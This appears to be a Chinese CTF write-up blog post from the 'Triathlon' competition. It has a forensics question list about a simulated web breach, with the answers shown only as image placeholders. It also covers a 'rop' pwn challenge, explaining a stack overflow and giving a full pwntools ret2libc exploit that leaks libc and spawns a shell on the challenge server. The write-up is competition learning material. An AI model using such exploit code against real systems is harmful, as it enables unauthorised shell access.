铁人三项赛——数据赛WP

1.网站后台密码是多少?
mark
mark

2.攻击者IP是多少?

mark

3.网站后台登陆地址是多少(http://+IP+路径)?
mark

4.后台写入的Webshell内容是什么?

mark

mark

5.网站数据库密码是多少?
mark

6.黑客第一个上传的php文件名是什么?

mark

mark

7.黑客对内网扫描的范围是多少(ip1-ip2)?

mark

8.黑客下载的数据库备份文件名是什么?

mark

mark

mark

9.黑客上传的图片木马的密码是多少?

mark

10.黑客修改了哪个文件来配合木马文件(绝对路径)?

mark

mark

11.FTP服务器开在了哪个端口?

mark

12.黑客使用FTP上传的文件名?

mark

13.黑客登陆FTP的密码是多少?

mark

14.黑客使用FTP上传的文件中的文件内容是什么?

mark

铁人三项赛——个人赛部分WP

1.rop

发现vulnerable_function()中存在溢出漏洞

mark

它申请了0x88的内存
mark

却读入了0x100的内容
mark

最后通过地址的覆盖拿到shell,以前有做过这类题,改了改参数,这是代码~

from pwn import *
DEBUG = 0
if DEBUG:
     #p = process('./rop')
     #scontext.log_level = 'debug'
     #libc = ELF('/lib32/libc-2.24.so')
     p = process(['./rop'], env={'LD_PRELOAD': os.path.join(os.getcwd(),'libc32')})
     libc = ELF('./libc32')

else:
     p = remote('比赛ip',端口号)
     libc = ELF('./libc32')
     #libc = ELF('libc_64.so.6')
#context.log_level = 'debug'

vuln_func=0x8048474
write_plt=0x80483A0    
write_got=0x804a010    
#free 0x134d

#gdb.attach(p,"b*0x804849C")
data='a'*0x88+'a'*4+p32(write_plt)+p32(vuln_func)+p32(1)+p32(write_got)+p32(0x4)
p.send(data)
write_addr=u32(p.recv(4))
libc_base=write_addr-libc.symbols['write']
system_addr=libc_base+libc.symbols['system']
binsh_addr=libc_base+next(libc.search('/bin/sh'))
data='a'*0x88+'a'*4+p32(system_addr)+'aaaa'+p32(binsh_addr)
p.send(data)
p.interactive()

萌新拙作,若有错误还请野生大佬指出(>人<;)~

分类: CTF

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注